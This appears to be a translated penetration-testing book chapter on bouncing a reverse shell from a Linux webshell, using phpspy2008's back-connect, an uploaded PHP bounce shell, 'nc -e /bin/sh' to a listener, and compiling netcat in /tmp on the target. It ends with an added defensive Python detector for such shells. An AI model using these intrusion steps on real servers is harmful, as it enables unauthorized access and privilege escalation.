Tips for bouncing back a shell through a webshell in Linux

13.2 Tips for bouncing back a shell through a webshell in Linux

In Linux, bouncing back a reverse shell through a webshell is used far more widely and far more often during website server intrusion and privilege escalation than it is on Windows.

The vast majority of Linux privilege escalation relies on local exploits. A webshell can generally execute commands, but an overflow exploit has to run in an interactive environment: executed directly from the webshell it is unusable even when the overflow itself succeeds. You therefore have to bounce back a shell command-line window and run the exploit from that terminal to raise privileges.

13.2.1 Reverse shell using a PHP webshell Trojan

In general, most PHP webshell Trojans and backdoors can bounce back a shell with their back connect function. The phpspy2008 backdoor, for example, has a back connect function that returns a shell command window inheriting the permissions of the current webshell.

Before using the back connect function, use the NC tool to listen locally on an unused port, for example port 8888, by executing the following command:

Then, on the webshell's back connect page, the IP address of the local machine is detected automatically and shown in "Your IP"; enter the listening port in "Your Port" (8080 here). Next, select the bounce connection method: phpspy2008 offers two, Perl and C, and Perl is used here (Figure 403).

Fig 403

After setting these, click "Start" to send the shell to the listening port; a shell command-line window appears in the NC listening window (Figure 404).

Fig 404

Besides phpspy2008, there are dedicated PHP reverse-shell webshells. First open the PHP bounce shell webshell file in a local text editor and find the following code:

Fig 405

Change the bounce IP address 111.123.96.28 to the local IP address. The default bounce port is 8888 and can also be changed (Figure 405). Save the modification and upload the file through the webshell. Assuming the uploaded file is at http://www.***.com/shell.php, open a local command prompt window and execute the following command:

This uses NC to listen on local port 8888. Now request http://www.***.com/shell.php, and a command-line shell from the website server is returned in the NC listening window.

13.2.2 Using NC to bounce back a shell

Sometimes the server does not support PHP, or the webshell fails to bounce back a shell. For example, some servers only support JSP and PHP. In that case, the classic Windows NC reverse shell method can be used as well.

To bounce back a cmd shell on Windows, you first run "nc -vv -l -p port number" on the local machine to listen on the port, then execute "nc -e cmd.exe listener IP address port" in the webshell, and a reverse shell comes back. The method still works on Linux, but needs a small change.

After listening on the port locally, when the NC bounce is run from the webshell, the program passed to -e is "/bin/sh" rather than cmd.exe, so that a Linux shell command-line window is sent to the listening host. For example, run the following command:

This bounces a shell to port 8888 of the listening host with the IP address 119.1.44.32.

13.2.3 Solution for remote hosts without NC tools

When using NC to bounce back a shell, you may find that the remote host cannot execute NC directly or does not have NC installed. In that case, install NC on the remote host by hand. If a locally compiled program does not run on the remote host, upload the source code and compile it on the target machine instead.

Compiling NC on the target machine needs some care, because until you have a shell command-line window, commands can only be executed through the webshell, generally one at a time, waiting for the result of each before running the next.

Also pay attention to the working directory during compilation. Because of Linux's strict permissions, even with a webshell the attacker often cannot write files directly under the web directory and can only upload the NC source into a folder such as /tmp (Figure 406).

Fig 406

For example, if the webshell sits in /var/www/, the default working directory for commands run from the webshell is /var/www/. If the Netcat source package was extracted to /tmp/netcat-0.7.1, then running make to compile Netcat fails because the current directory is /var/www/ rather than /tmp/netcat-0.7.1. The fix is simple: write the directory change and make as a single command line, separated by a semicolon.

After the netcat-0.7.1 source file has been uploaded to the writable folder /tmp, compiling NC through the webshell goes as follows:

Fig 407

Running this command extracts the netcat-0.7.1 source to the /tmp/netcat-0.7.1 directory (Figure 407). Then run the following command:

After configuration completes, run the following command to compile:

Because of the semicolon, the two commands run as one line: the directory change precedes make, and compilation reports no error (Figure 408).

Fig 408

After compilation succeeds, you can enter the command to bounce back a shell. For example, with NC at /tmp/netcat-0.7.1/nc, run "nc -vv -l -p 8080" locally to listen on port 8080, then run the following command in the webshell (Figure 409):

Fig 409

A shell command-line window is bounced back to the host. Note that the bounced Linux shell has no $ prompt: you enter one command and one response comes back (Figure 410). /bin/sh is run in the reverse shell here; /bin/bash can also be run, but /bin/sh is less restrictive than /bin/bash, so its success rate is higher.

Fig 410
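Added defender-side example, not from the original article: every variant above (phpspy's Perl back connect, "nc -e /bin/sh", the nc compiled in /tmp) ends with a shell whose stdin, stdout and stderr are a network socket and whose parent chain leads back to the web server. This Python check reads that condition from /proc on Linux; the process names in SHELLS and WEB_SERVERS, the 8-level ancestry limit and the SAMPLE table are assumptions constructed for the example.

```python
"""Added defender-side check for the reverse shells described above: flag a sh/bash/nc/perl
process with stdin/stdout/stderr on sockets whose ancestry includes the web server."""
import os

SHELLS = {"sh", "bash", "dash", "nc", "netcat", "perl"}           # assumed shell/bounce names
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm", "php-cgi"}  # assumed web server names

def is_reverse_shell(proc, by_pid):  # proc = {pid, ppid, comm, fds}; fds = targets of fd 0-2
    if proc["comm"] not in SHELLS or not any(t.startswith("socket:[") for t in proc["fds"]):
        return False
    ppid, depth = proc["ppid"], 0            # walk up at most 8 ancestors
    while ppid in by_pid and depth < 8:
        if by_pid[ppid]["comm"] in WEB_SERVERS:
            return True
        ppid, depth = by_pid[ppid]["ppid"], depth + 1
    return False

def find_reverse_shells(by_pid):
    return sorted(p["pid"] for p in by_pid.values() if is_reverse_shell(p, by_pid))

def read_proc():
    """Build the same records from a live Linux /proc; unreadable entries are skipped."""
    by_pid = {}
    for name in filter(str.isdigit, os.listdir("/proc")):
        pid = int(name)
        try:
            stat = open(f"/proc/{pid}/stat").read()
            comm = stat[stat.index("(") + 1:stat.rindex(")")]   # comm itself may hold spaces
            ppid = int(stat[stat.rindex(")") + 2:].split()[1])  # fields after ')': state, ppid
            fds = []
            for fd in (0, 1, 2):
                try:
                    fds.append(os.readlink(f"/proc/{pid}/fd/{fd}"))
                except OSError:
                    pass                      # fd closed, or not ours to read
            by_pid[pid] = {"pid": pid, "ppid": ppid, "comm": comm, "fds": fds}
        except OSError:
            continue                          # process exited or is not readable
    return by_pid

# Constructed sample table (not from a real host): 4100 is an nc -e /bin/sh style child of
# apache2 with stdio on a socket; 4200 is an admin bash on a tty; 4300 is sh on a socket but
# not under a web server, so only 4100 should be flagged.
SAMPLE = {
    1: {"pid": 1, "ppid": 0, "comm": "systemd", "fds": ["/dev/null"] * 3},
    900: {"pid": 900, "ppid": 1, "comm": "apache2", "fds": ["/dev/null"] * 3},
    4100: {"pid": 4100, "ppid": 900, "comm": "sh", "fds": ["socket:[81234]"] * 3},
    4200: {"pid": 4200, "ppid": 1, "comm": "bash", "fds": ["/dev/pts/0"] * 3},
    4300: {"pid": 4300, "ppid": 1, "comm": "sh", "fds": ["socket:[9]"] * 3},
}
```

On a live host call find_reverse_shells(read_proc()) as root, since /proc/PID/fd of other users' processes is not readable otherwise; a bounced shell running as the web server account is the case this matches.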
